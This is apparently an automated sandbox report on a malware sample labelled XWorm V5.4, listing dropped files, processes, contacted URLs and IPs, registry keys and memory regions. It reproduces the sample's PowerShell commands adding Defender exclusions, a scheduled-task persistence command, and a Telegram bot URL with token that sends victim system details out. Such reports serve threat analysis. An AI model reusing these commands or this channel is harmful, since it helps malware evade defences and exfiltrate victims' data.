Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Or3dzp4vB1.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Roaming\0720XW
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xe0b710cf, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0720XW.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05yyfy53.db4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aentktq4.4vc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afdtdl0z.i0h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxpmkh11.2yd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef2tlzqn.fmk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0yqruff.2dr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_feth5wr1.fpm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fj3kxqne.uo4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1f23rlk.bpb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbk4ndre.nm4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5wyrqfc.3bd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1mvdb51.ypg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqygyiw.0fq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxzsiqxr.i4k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzu1l1j4.but.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xa0vhzl1.nck.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 12:12:39
2024, mtime=Wed Sep 25 12:12:39 2024, atime=Wed Sep 25 12:12:39 2024, length=81920, window=hide
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Or3dzp4vB1.exe
|
"C:\Users\user\Desktop\Or3dzp4vB1.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
|
||
C:\Users\user\AppData\Roaming\0720XW
|
C:\Users\user\AppData\Roaming\0720XW
|
||
C:\Users\user\AppData\Roaming\0720XW
|
C:\Users\user\AppData\Roaming\0720XW
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\OpenWith.exe
|
C:\Windows\system32\OpenWith.exe -Embedding
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\OpenWith.exe
|
C:\Windows\system32\OpenWith.exe -Embedding
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720
|
149.154.167.220
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
185.196.10.235
|
|||
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
http://crl.m(l
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.microsoft.co3
|
unknown
|
||
http://crl.micM;
|
unknown
|
||
https://.VisualC
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.mic?8
|
unknown
|
||
http://crl.micros
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
185.196.10.235
|
unknown
|
Switzerland
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
0720XW
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Mozilla Firefox\firefox.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Mozilla Firefox\firefox.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Internet Explorer\iexplore.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Internet Explorer\iexplore.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\mspaint.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\mspaint.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\NOTEPAD.EXE.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\system32\NOTEPAD.EXE.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 24 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
A82000
|
unkown
|
page readonly
|
||
7FFAACBB3000
|
trusted library allocation
|
page execute and read and write
|
||
BF1000
|
heap
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
19F16FF000
|
stack
|
page read and write
|
||
20728BA0000
|
heap
|
page read and write
|
||
1661EFC2000
|
trusted library allocation
|
page read and write
|
||
18C48AE9000
|
heap
|
page read and write
|
||
18C46B57000
|
heap
|
page read and write
|
||
17A81868000
|
trusted library allocation
|
page read and write
|
||
1661EF30000
|
trusted library allocation
|
page read and write
|
||
1661C378000
|
heap
|
page read and write
|
||
1E8AD441000
|
trusted library allocation
|
page read and write
|
||
17A80F6E000
|
trusted library allocation
|
page read and write
|
||
690000
|
unkown
|
page readonly
|
||
18C48A0B000
|
heap
|
page read and write
|
||
20723FD5000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
1E89E4E0000
|
trusted library allocation
|
page read and write
|
||
18C48A24000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
12871000
|
trusted library allocation
|
page read and write
|
||
17A81950000
|
trusted library allocation
|
page read and write
|
||
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
18C46B1D000
|
heap
|
page read and write
|
||
1E89B683000
|
heap
|
page read and write
|
||
2A81000
|
trusted library allocation
|
page read and write
|
||
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
224B5547000
|
heap
|
page execute and read and write
|
||
C85000
|
heap
|
page read and write
|
||
2249B6D0000
|
trusted library allocation
|
page read and write
|
||
207245B3000
|
heap
|
page read and write
|
||
1E8B5893000
|
heap
|
page read and write
|
||
1E89ED72000
|
trusted library allocation
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
20724562000
|
heap
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
20722600000
|
heap
|
page read and write
|
||
7FFAACC76000
|
trusted library allocation
|
page execute and read and write
|
||
BE7000
|
heap
|
page read and write
|
||
7FFB22760000
|
unkown
|
page readonly
|
||
17AF7145000
|
heap
|
page read and write
|
||
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
1C43D390000
|
trusted library allocation
|
page read and write
|
||
1E89E6C9000
|
trusted library allocation
|
page read and write
|
||
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
17A811DD000
|
trusted library allocation
|
page read and write
|
||
25ED8FE000
|
stack
|
page read and write
|
||
12878000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
17A81E26000
|
trusted library allocation
|
page read and write
|
||
1C4390F6000
|
heap
|
page read and write
|
||
18C48AD3000
|
heap
|
page read and write
|
||
7FFAACEEC000
|
trusted library allocation
|
page read and write
|
||
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
17AF717E000
|
heap
|
page read and write
|
||
20724668000
|
heap
|
page read and write
|
||
7FFAACB84000
|
trusted library allocation
|
page read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
E7AB8FA000
|
stack
|
page read and write
|
||
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
1661C384000
|
heap
|
page read and write
|
||
7FFAACBC2000
|
trusted library allocation
|
page read and write
|
||
166365C9000
|
heap
|
page read and write
|
||
207245C6000
|
heap
|
page read and write
|
||
2072466D000
|
heap
|
page read and write
|
||
18C46B0C000
|
heap
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
18C48A20000
|
heap
|
page read and write
|
||
332384C000
|
stack
|
page read and write
|
||
7FFAACBDC000
|
trusted library allocation
|
page execute and read and write
|
||
BDC000
|
heap
|
page read and write
|
||
2249E990000
|
trusted library allocation
|
page read and write
|
||
20724691000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
1C473000
|
stack
|
page read and write
|
||
20724560000
|
heap
|
page read and write
|
||
18C46AFB000
|
heap
|
page read and write
|
||
1E8B5D20000
|
heap
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
E7AC88F000
|
stack
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
224B504B000
|
heap
|
page read and write
|
||
17A81078000
|
trusted library allocation
|
page read and write
|
||
18C4B218000
|
heap
|
page read and write
|
||
18C489EA000
|
heap
|
page read and write
|
||
1E89D184000
|
heap
|
page read and write
|
||
20724592000
|
heap
|
page read and write
|
||
2249EE1D000
|
trusted library allocation
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
B61000
|
heap
|
page read and write
|
||
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
224B59E0000
|
heap
|
page read and write
|
||
17A81DDC000
|
trusted library allocation
|
page read and write
|
||
207245BE000
|
heap
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
1661C438000
|
heap
|
page read and write
|
||
7FFAACFB0000
|
trusted library allocation
|
page read and write
|
||
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
207225A8000
|
heap
|
page read and write
|
||
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
224B579E000
|
heap
|
page read and write
|
||
7FFAACC70000
|
trusted library allocation
|
page read and write
|
||
224B5582000
|
heap
|
page read and write
|
||
1D918FE000
|
stack
|
page read and write
|
||
7FFAAD020000
|
trusted library allocation
|
page read and write
|
||
1843ECA0000
|
heap
|
page read and write
|
||
2249E01E000
|
trusted library allocation
|
page read and write
|
||
7FFB2277D000
|
unkown
|
page readonly
|
||
18C48A24000
|
heap
|
page read and write
|
||
2249D50D000
|
trusted library allocation
|
page read and write
|
||
7FFAACD31000
|
trusted library allocation
|
page read and write
|
||
18C48340000
|
heap
|
page read and write
|
||
1CF6A000
|
stack
|
page read and write
|
||
1E8B57ED000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
20724586000
|
heap
|
page read and write
|
||
1C43D370000
|
trusted library allocation
|
page read and write
|
||
7FFAAD010000
|
trusted library allocation
|
page read and write
|
||
2249E377000
|
trusted library allocation
|
page read and write
|
||
1E89E01B000
|
trusted library allocation
|
page read and write
|
||
207245B1000
|
heap
|
page read and write
|
||
7FFAACB93000
|
trusted library allocation
|
page execute and read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
20722587000
|
heap
|
page read and write
|
||
BF5000
|
heap
|
page read and write
|
||
1CB70000
|
heap
|
page read and write
|
||
2249E8A9000
|
trusted library allocation
|
page read and write
|
||
18C48A28000
|
heap
|
page read and write
|
||
1D914FE000
|
unkown
|
page readonly
|
||
2249D0C8000
|
trusted library allocation
|
page read and write
|
||
207225AF000
|
heap
|
page read and write
|
||
3E2D137000
|
stack
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
7FFAACC36000
|
trusted library allocation
|
page read and write
|
||
1661F238000
|
trusted library allocation
|
page read and write
|
||
20723FDC000
|
heap
|
page read and write
|
||
1C43D289000
|
trusted library allocation
|
page read and write
|
||
16636716000
|
heap
|
page read and write
|
||
207246FC000
|
heap
|
page read and write
|
||
1C4390EE000
|
heap
|
page read and write
|
||
17A81038000
|
trusted library allocation
|
page read and write
|
||
7FFAACC36000
|
trusted library allocation
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
17A804CD000
|
trusted library allocation
|
page read and write
|
||
1D9127B000
|
stack
|
page read and write
|
||
1E8AD451000
|
trusted library allocation
|
page read and write
|
||
1C438C50000
|
trusted library section
|
page readonly
|
||
2072469B000
|
heap
|
page read and write
|
||
17AF70D0000
|
heap
|
page read and write
|
||
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
207245BB000
|
heap
|
page read and write
|
||
2249DFE3000
|
trusted library allocation
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
207246FC000
|
heap
|
page read and write
|
||
2072465A000
|
heap
|
page read and write
|
||
2072259D000
|
heap
|
page read and write
|
||
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
18C48A12000
|
heap
|
page read and write
|
||
20722592000
|
heap
|
page read and write
|
||
20724586000
|
heap
|
page read and write
|
||
17AF6E50000
|
trusted library allocation
|
page read and write
|
||
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
1661C3CD000
|
heap
|
page read and write
|
||
EE0000
|
trusted library allocation
|
page read and write
|
||
18C48BB9000
|
heap
|
page read and write
|
||
1C437C9C000
|
heap
|
page read and write
|
||
7FFAACCA5000
|
trusted library allocation
|
page execute and read and write
|
||
7DF43C4B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACEE8000
|
trusted library allocation
|
page read and write
|
||
1D927FE000
|
unkown
|
page readonly
|
||
224B5577000
|
heap
|
page read and write
|
||
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
224B5950000
|
trusted library allocation
|
page read and write
|
||
7FFAACD50000
|
trusted library allocation
|
page execute and read and write
|
||
1662E27B000
|
trusted library allocation
|
page read and write
|
||
1843EF90000
|
heap
|
page read and write
|
||
18C48AC6000
|
heap
|
page read and write
|
||
18C48A05000
|
heap
|
page read and write
|
||
3E2D47E000
|
stack
|
page read and write
|
||
1D929FD000
|
stack
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACB94000
|
trusted library allocation
|
page read and write
|
||
1D91CFC000
|
stack
|
page read and write
|
||
1843EDB0000
|
heap
|
page read and write
|
||
18C48A01000
|
heap
|
page read and write
|
||
2249E215000
|
trusted library allocation
|
page read and write
|
||
2072472F000
|
heap
|
page read and write
|
||
18C489FC000
|
heap
|
page read and write
|
||
7FFAACC7C000
|
trusted library allocation
|
page execute and read and write
|
||
E7ABB3F000
|
stack
|
page read and write
|
||
7FFAACF7C000
|
trusted library allocation
|
page read and write
|
||
20724674000
|
heap
|
page read and write
|
||
C75000
|
heap
|
page read and write
|
||
17AF7877000
|
heap
|
page read and write
|
||
B8B000
|
heap
|
page read and write
|
||
18C46B0C000
|
heap
|
page read and write
|
||
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
1E8B59A7000
|
heap
|
page read and write
|
||
1D91AF9000
|
stack
|
page read and write
|
||
1E8B57B3000
|
heap
|
page read and write
|
||
17AF70C0000
|
trusted library allocation
|
page read and write
|
||
7FFAACEB3000
|
trusted library allocation
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
1C437C13000
|
heap
|
page read and write
|
||
4148CF7000
|
stack
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
7DF4588B0000
|
trusted library allocation
|
page execute and read and write
|
||
1E89D3F0000
|
trusted library allocation
|
page read and write
|
||
207246DB000
|
heap
|
page read and write
|
||
1C438B30000
|
trusted library allocation
|
page read and write
|
||
7FFAACF7C000
|
trusted library allocation
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
2249E3C1000
|
trusted library allocation
|
page read and write
|
||
18C48B1E000
|
heap
|
page read and write
|
||
7FFAACF2C000
|
trusted library allocation
|
page read and write
|
||
17A80D86000
|
trusted library allocation
|
page read and write
|
||
20728BA8000
|
heap
|
page read and write
|
||
17AF6EA0000
|
trusted library allocation
|
page read and write
|
||
2249EE62000
|
trusted library allocation
|
page read and write
|
||
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
E7ACA0C000
|
stack
|
page read and write
|
||
1C43D3D0000
|
remote allocation
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
1AFFD000
|
stack
|
page read and write
|
||
18C48A18000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
1661C2C0000
|
heap
|
page read and write
|
||
18C489D0000
|
heap
|
page read and write
|
||
207225A2000
|
heap
|
page read and write
|
||
207246F8000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
1843EF95000
|
heap
|
page read and write
|
||
4149DCE000
|
stack
|
page read and write
|
||
17AF5485000
|
heap
|
page read and write
|
||
207245B6000
|
heap
|
page read and write
|
||
224B5785000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
18C48A0E000
|
heap
|
page read and write
|
||
18C46B45000
|
heap
|
page read and write
|
||
207245A1000
|
heap
|
page read and write
|
||
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
20724672000
|
heap
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
18C489D0000
|
heap
|
page read and write
|
||
20724589000
|
heap
|
page read and write
|
||
7FFAACFE0000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
2CC1000
|
trusted library allocation
|
page read and write
|
||
18C489E4000
|
heap
|
page read and write
|
||
1C43905E000
|
heap
|
page read and write
|
||
1661E9E3000
|
trusted library allocation
|
page read and write
|
||
2D49000
|
trusted library allocation
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
3322AFE000
|
stack
|
page read and write
|
||
20724716000
|
heap
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
18C48A1C000
|
heap
|
page read and write
|
||
20724583000
|
heap
|
page read and write
|
||
224AD0B4000
|
trusted library allocation
|
page read and write
|
||
207225AF000
|
heap
|
page read and write
|
||
17AF54F9000
|
heap
|
page read and write
|
||
1C438A40000
|
trusted library allocation
|
page read and write
|
||
207245A6000
|
heap
|
page read and write
|
||
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
18C48330000
|
heap
|
page read and write
|
||
18C489F9000
|
heap
|
page read and write
|
||
7FFAACFC0000
|
trusted library allocation
|
page read and write
|
||
20724596000
|
heap
|
page read and write
|
||
18C489EB000
|
heap
|
page read and write
|
||
17AF5544000
|
heap
|
page read and write
|
||
18C48ADB000
|
heap
|
page read and write
|
||
207245B3000
|
heap
|
page read and write
|
||
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
C2A000
|
heap
|
page read and write
|
||
7FFAACBBD000
|
trusted library allocation
|
page execute and read and write
|
||
2072459B000
|
heap
|
page read and write
|
||
18C48B97000
|
heap
|
page read and write
|
||
20724664000
|
heap
|
page read and write
|
||
7FFAACB83000
|
trusted library allocation
|
page execute and read and write
|
||
1C439200000
|
trusted library allocation
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
1BA9E000
|
stack
|
page read and write
|
||
7E1000
|
stack
|
page read and write
|
||
18C48A30000
|
heap
|
page read and write
|
||
18C48A0B000
|
heap
|
page read and write
|
||
18C48A09000
|
heap
|
page read and write
|
||
4149C4A000
|
stack
|
page read and write
|
||
7FFAAD000000
|
trusted library allocation
|
page read and write
|
||
20723FDD000
|
heap
|
page read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
18C48A2C000
|
heap
|
page read and write
|
||
1663668C000
|
heap
|
page read and write
|
||
F45000
|
heap
|
page read and write
|
||
18C48510000
|
